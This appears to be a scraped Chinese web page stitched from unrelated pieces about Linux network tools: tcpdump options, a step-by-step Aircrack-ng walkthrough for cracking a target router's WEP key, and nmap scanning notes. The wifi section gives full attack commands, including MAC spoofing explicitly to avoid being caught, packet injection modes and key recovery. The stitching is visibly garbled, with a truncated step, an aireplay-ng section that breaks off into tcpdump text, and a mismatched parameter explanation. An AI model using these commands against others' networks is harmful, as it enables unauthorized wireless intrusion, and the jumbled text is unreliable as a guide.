用tcpdum命令可以抓指定IP的包,具體命令為:
成都創(chuàng)新互聯(lián)專注于平陰企業(yè)網(wǎng)站建設(shè),響應(yīng)式網(wǎng)站,商城開發(fā)。平陰網(wǎng)站建設(shè)公司,為平陰等地區(qū)提供建站服務(wù)。全流程按需網(wǎng)站策劃,專業(yè)設(shè)計,全程項目跟蹤,成都創(chuàng)新互聯(lián)專業(yè)和態(tài)度為您提供的服務(wù)
tcpdump tcp -i eth1 -t -s 0 -c 100 and dst port 22 and src net 192.168.1.1 -w ./target.cap
參數(shù)解析:
tcp: ip icmp arp rarp 和 tcp、udp、icmp這些選項等都要放到第一個參數(shù)的位置,用來過濾數(shù)據(jù)報的類型。
-i eth1 : 只抓經(jīng)過接口eth1的包
-t : 不顯示時間戳
-s 0 : 抓取數(shù)據(jù)包時默認抓取長度為68字節(jié)。加上-S 0 后可以抓到完整的數(shù)據(jù)包
-c 100 : 只抓取100個數(shù)據(jù)包
dst port? 22 : 抓取目標(biāo)端口是22的數(shù)據(jù)包
src net 192.168.1.0/24 : 數(shù)據(jù)包的源網(wǎng)絡(luò)地址為192.168.1.1
-w ./target.cap : 保存成cap文件,方便用ethereal(即wireshark)分析
擴展資料
tcpdump語法格式:
tcpdump [-adeflnNOpqStvx][-c數(shù)據(jù)包數(shù)目][-dd][-ddd][-F表達文件][-i網(wǎng)絡(luò)界面][-r數(shù)據(jù)包文件][-s數(shù)據(jù)包大小][-tt][-T數(shù)據(jù)包類型][-vv][-w數(shù)據(jù)包文件][輸出數(shù)據(jù)欄位]
tcpdump主要參數(shù)說明:
1、-a 嘗試將網(wǎng)絡(luò)和廣播地址轉(zhuǎn)換成名稱。
2、-c數(shù)據(jù)包數(shù)目 收到指定的數(shù)據(jù)包數(shù)目后,就停止進行傾倒操作。
3、-d 把編譯過的數(shù)據(jù)包編碼轉(zhuǎn)換成可閱讀的格式,并傾倒到標(biāo)準(zhǔn)輸出。
4、-dd 把編譯過的數(shù)據(jù)包編碼轉(zhuǎn)換成C語言的格式,并傾倒到標(biāo)準(zhǔn)輸出。
5、-ddd 把編譯過的數(shù)據(jù)包編碼轉(zhuǎn)換成十進制數(shù)字的格式,并傾倒到標(biāo)準(zhǔn)輸出。
6、-e 在每列傾倒資料上顯示連接層級的文件頭。
7、-f 用數(shù)字顯示網(wǎng)際網(wǎng)絡(luò)地址。
8、-F表達文件 指定內(nèi)含表達方式的文件。
9、-i網(wǎng)絡(luò)界面 使用指定的網(wǎng)絡(luò)截面送出數(shù)據(jù)包。
10、-l 使用標(biāo)準(zhǔn)輸出列的緩沖區(qū)。
11、-n 不把主機的網(wǎng)絡(luò)地址轉(zhuǎn)換成名字。
12、-N 不列出域名。
Aircrack-ng系列工具也有Windows 平臺版本,但是本人的小黑的始終不能在win下抓包,所以只能 棄 Windows 從Linux 了,另外 Windows 下掃描到的 AP 也比 Linux 下少了很多。其實 Windows 并不完整的支持 TCP/IP 協(xié)議族,有些協(xié)議Windows 直接丟棄不用。網(wǎng)絡(luò)本來從一開始就是 Unix 的天下,Windows 只是在后來加入了網(wǎng)絡(luò)的功能。
Aircrack-ng工具包有很多工具,我用到的工具主要有以下幾個:
airmon-ng 處理網(wǎng)卡工作模式
airodump-ng 抓包
aircrack-ng 破解
aireplay-ng 發(fā)包,干擾
另外還要用到以下 linux 命令:
ifconfig 查看修改網(wǎng)卡狀態(tài)和參數(shù)
macchanger 偽造 MAC
iwconfig 主要針對無線網(wǎng)卡的工具 (同 ifconfig)
iwlist 獲取無線網(wǎng)絡(luò)的更詳細信息
另外還有其他的 linux 基本命令,我就不提示了。
具體破解步驟:
1. 修改無線網(wǎng)卡狀態(tài):先 dow
2. 偽造無線網(wǎng)卡的 MAC 地址:安全起見,減少被抓到的可能
3. 修改網(wǎng)卡工作模式:進入Monitor狀態(tài),會產(chǎn)生一個虛擬的網(wǎng)卡
4. 修改無線網(wǎng)卡狀態(tài): up
5. 查看網(wǎng)絡(luò)狀態(tài),記錄下 AP 的 MAC 和本機的 MAC ,確定攻擊目標(biāo)
6. 監(jiān)聽抓包:生成 .cap 或 .ivs
7. 干擾無線網(wǎng)絡(luò):截取無線數(shù)據(jù)包,發(fā)送垃圾數(shù)據(jù)包,用來獲得更多的有效數(shù)據(jù)包
8. 破解 .cap 或 .ivs ,獲得 WEP 密碼,完成破解
Crack Mode一共有5種請酌情使用還有網(wǎng)卡不一定是ath1也有可能是wifi0,ath0等等
ifconfig -a
ifconfig -a ath0 up
airmon-ng start wifi0 6
airodump-ng --ivs -w 目標(biāo)路由器IVS文件 -c 6 ath1
airodump-ng ath1
aireplay-ng -1 0 -e 目標(biāo)路由器SSID -a 目標(biāo)MAC -h 本機MAC ath1
----------- -2 Crack Mode-----------
aireplay-ng -2 -p 0841 -c ffffffffffff -b 目標(biāo)MAC -h 本機MAC ath1
----------- -3 Crack Mode-----------
aireplay-ng -3 -b 目標(biāo)MAC -h 本機MAC ath1
----------- -4 Crack Mode-----------
aireplay-ng -4 -b 目標(biāo)MAC -h 本機MAC ath1
packetforge-ng -0 -a 目標(biāo)MAC -h 本機MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp
aireplay-ng -2 -r MyArp -x 256 ath1
----------- -5 Crack Mode-----------
aireplay-ng -5 -b 目標(biāo)MAC -h 本機MAC ath1
packetforge-ng -0 -a 目標(biāo)MAC -h 本機MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp
aireplay-ng -2 -r MyArp -x 256 ath1
-----------Crack Key-----------
aircrack-ng -n 64 -b 目標(biāo)MAC 目標(biāo)路由器IVS文件-01.ivs
——————————————————————————————
下面詳細介紹一下各個命令的基本用法(參照命令的英文說明)
1. ifconfig
用來配置網(wǎng)卡,我們這里主要用來 禁用和啟用 網(wǎng)卡:
ifconfig ath0 down
ifconfig ath0 up
禁用一下網(wǎng)卡的目的是為了下一步修改 MAC 。
2.macchanger
用來改變網(wǎng)卡的 MAC 地址,具體用法如下:
usage: macchanger [options] device
-h 顯示幫助
-V 顯示版本
-s 顯示當(dāng)前MAC
-e 不改變mac,使用硬件廠商寫入的MAC
-a 自動生成一個同類型的MAC,同廠商的
-A 自動生成一個不同類型的MAC,不同廠商的
-r 生成任意MAC
-l 顯示已知廠商的網(wǎng)卡MAC地址分配,這個很有用,可以根據(jù)MAC查出來是哪個廠商生產(chǎn)的產(chǎn)品
-m 設(shè)置一個自定義的MAC 如: macchanger --mac=00:34:00:00:00:00 ath0 。
3.airmon-ng
啟動無線網(wǎng)卡進入 Monitor 模式,
useage: airmon-ng start|stop|check interface [channel]
start|stop|check啟動,停止,檢測
interface指定無線網(wǎng)卡
[channel] 監(jiān)聽頻道,現(xiàn)代大多數(shù)無線路由默認是 6,隨便掃描一下都是這個頻道,網(wǎng)管們應(yīng)該換換了
4.iwconfig
專用的無線網(wǎng)卡配置工具,用來配置特殊的網(wǎng)絡(luò)信息,不帶參數(shù)時顯示可用網(wǎng)絡(luò)。
useage:iwconfig interface [options]
[essid{NN|ON|OFF}] 指定essid號 開啟關(guān)閉
[nwid{NN|on|off}] 指定網(wǎng)絡(luò)id號 開啟關(guān)閉
[mode {managed|ad-hoc|....}] 指定無線網(wǎng)絡(luò)工作模式/類型
[freq N.NNNN[K|M|G]] 指定工作頻率
[channel N] 指定頻道
[ap {N|off|auto}] 指定AP號 關(guān)閉/自動
[sens N] sens 號
[nick N] nick 號
[rate {N|auto|fixed}] 速率控制
[rts {N|auto|fixed|off}] rts控制,如果不知道什么是RTS,那就回去好好去學(xué)網(wǎng)絡(luò),不用往下看了
[frag {N|auto|fixed|off}] 碎片控制
[enc {NNNN-NNNN|off}] 范圍
[power {period N|timeout N}] 電源 頻率/超時
[retry {limit N|lifetime N}] 重試 限次/超時
[txpower N{mw|dBm}] 功率 毫瓦/分貝
[commit] 處理
5.iwlist
主要用來顯示無線網(wǎng)卡的一些附加信息,同上
useage: iwlist [interface] options
scanning 掃描
frequency 頻率
channel 頻道
bitrate 速率
rate 速率
encryption 加密
key 密鑰
power 電源
txpower 功率
ap ap
accespoints ap
peers 直連
event 事件
6.airodump-ng
抓包工具,我最喜歡用的,詳細用法如下:
usage: airodump-ng options interface[,interface,...]
Options:
--ivs :僅將抓取信息保存為 .ivs
--gpsd :使用 GPSd
--write prefix :保存為指定日文件名,我一般用這個,尤其是多個網(wǎng)絡(luò)時,指定了也好區(qū)分
-w :同 --write
--beacons :保存所有的 beacons ,默認情況況下是丟棄那些無用的數(shù)據(jù)包的
--update secs :顯示更新延遲,沒有用過
--showack :顯示ack/cts/rts狀態(tài),還是那句,不知道rts就不用看了
-h :隱藏已知的,配合上面的選項使用
-f msecs :跳頻時間
--berlin secs :無數(shù)據(jù)包接收時延遲顯示的時間,這句不太好翻譯,意思是當(dāng)那個信號發(fā)出設(shè)備沒有發(fā)出數(shù)據(jù)包多少時間之后,就停止對它的監(jiān)視.默認120秒.建議學(xué)好英文去讀原文,翻譯的都會有出入,這是我的理解.(mhy_mhy注)
-r file :從指定的文件讀取數(shù)據(jù)包.我也想有人給我抓好包放哪里,呵呵
Filter options:
--encrypt suite : 使用密碼序列過濾 AP
--netmask netmask : 使用掩碼過濾 AP
--bssid bssid : 使用 bssid 過濾 AP
-a : 過濾無關(guān)的客戶端
默認情況下使用2.4Ghz,你也可以指定其他的頻率,通過以下命令操作:
--channel channels:指定頻道
--band abg :制定帶寬
-C frequencies :指定頻率MHz
--cswitch method : 設(shè)置頻道交換方式
0 : FIFO (default) 先進先出(默認)
1 : Round Robin 循環(huán)
2 : Hop on last 最后一跳
-s : 同上
--help : 顯示使用方法,翻譯到這里,感覺還是英文的貼切一點,建議讀原文
7.aireplay-ng
tcpdump,就可以用這個抓包了,具體使用 tcpdump -vvv -nn -port 80 -w /tmp/file,你也可以用man tcpdump 查看此命令的具體使用
? 眾所周知,在Windows下開發(fā)運行環(huán)境下,在調(diào)試網(wǎng)絡(luò)環(huán)境時,可以可以很方便的借助wireshark等軟件進行抓包分析;并且在linux或者Ubuntu等桌面版里也可以進行安裝抓包工具進行抓包分析,但總有一些情況,無法直接運用工具(比如一些沒有界面的linux環(huán)境系統(tǒng)中),則此時我們就需要使用到最簡單的tcpdump命令進行網(wǎng)絡(luò)抓包。
? 一般的,linux下抓包時,抓取特定的網(wǎng)絡(luò)數(shù)據(jù)包到當(dāng)前文件夾下的文件中,再把文件拷貝出來利用Windows下的wireshark軟件進行分析。
tcpdump命令詳解:(簡單舉例)
? 1、抓取到的文件為filename.cap,然后將此文件拷貝到Windows下,使用wireshar打開后,即可對此文件進行分析。
? 2、eth0 是主機的網(wǎng)絡(luò)適配器名稱,具體的參數(shù)值可以在linux命令行窗口中通過 ifconfig 指令查詢。
NMAP掃描
一款強大的網(wǎng)絡(luò)探測利器工具
支持多種探測技術(shù)
--ping掃描
--多端口掃描
-- TCP/IP指紋校驗
為什么需要掃描?
以獲取一些公開/非公開信息為目的
--檢測潛在風(fēng)險
--查找可攻擊目標(biāo)
--收集設(shè)備/主機/系統(tǒng)/軟件信息
--發(fā)現(xiàn)可利用的安全漏洞
基本用法
nmap [掃描類型] [選項] 掃描目標(biāo)...
常用的掃描類型
常用選項
-sS TCP SYN掃描(半開) 該方式發(fā)送SYN到目標(biāo)端口,如果收到SYN/ACK回復(fù),那么判斷端口是開放的;如果收到RST包,說明該端口是關(guān)閉的。簡單理解就是3次握手只完成一半就可以判斷端口是否打開,提高掃描速度
-sT TCP 連接掃描(全開)
-sU UDP掃描
-sP ICMP掃描
-sV 探測打開的端口對應(yīng)的服務(wù)版本信息
-A 目標(biāo)系統(tǒng)全面分析 (可能會比較慢)
-p 掃描指定端口
1 ) 檢查目標(biāo)主機是否能ping通
2)檢查目標(biāo)主機所開啟的TCP服務(wù)
3 ) 檢查192.168.4.0/24網(wǎng)段內(nèi)哪些主機開啟了FTP、SSH服務(wù)
4)檢查目標(biāo)主機所開啟的UDP服務(wù)
5 ) 探測打開的端口對應(yīng)的服務(wù)版本信息
6)全面分析目標(biāo)主機192.168.4.100的操作系統(tǒng)信息
tcpdump
命令行抓取數(shù)據(jù)包工具
基本用法
tcpdump [選項] [過濾條件]
常見監(jiān)控選項
-i,指定監(jiān)控的網(wǎng)絡(luò)接口(默認監(jiān)聽第一個網(wǎng)卡)
-A,轉(zhuǎn)換為 ACSII 碼,以方便閱讀
-w,將數(shù)據(jù)包信息保存到指定文件
-r,從指定文件讀取數(shù)據(jù)包信息
常用的過濾條件:
類型:host、net、port、portrange
方向:src、dst
協(xié)議:tcp、udp、ip、wlan、arp、……
多個條件組合:and、or、not
案例1
案例2:使用tcpdump分析FTP訪問中的明文交換信息
1 ) 安裝部署vsftpd服務(wù)
2 ) 并啟動tcpdump等待抓包
執(zhí)行tcpdump命令行,添加適當(dāng)?shù)倪^濾條件,只抓取訪問主機192.168.4.100的21端口的數(shù)據(jù)通信 ,并轉(zhuǎn)換為ASCII碼格式的易讀文本。
3 ) case100作為客戶端訪問case254服務(wù)端
4 ) 查看tcpdump抓包
5 ) 再次使用tcpdump抓包,使用-w選項可以將抓取的數(shù)據(jù)包另存為文件,方便后期慢慢分析。
6 ) tcpdump命令的-r選項,可以去讀之前抓取的歷史數(shù)據(jù)文件
文章名稱:linux系統(tǒng)抓包命令 linux抓包指令詳解
網(wǎng)頁URL:http://muchs.cn/article4/hgecie.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供外貿(mào)建站、動態(tài)網(wǎng)站、建站公司、網(wǎng)站維護、網(wǎng)站營銷、自適應(yīng)網(wǎng)站
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)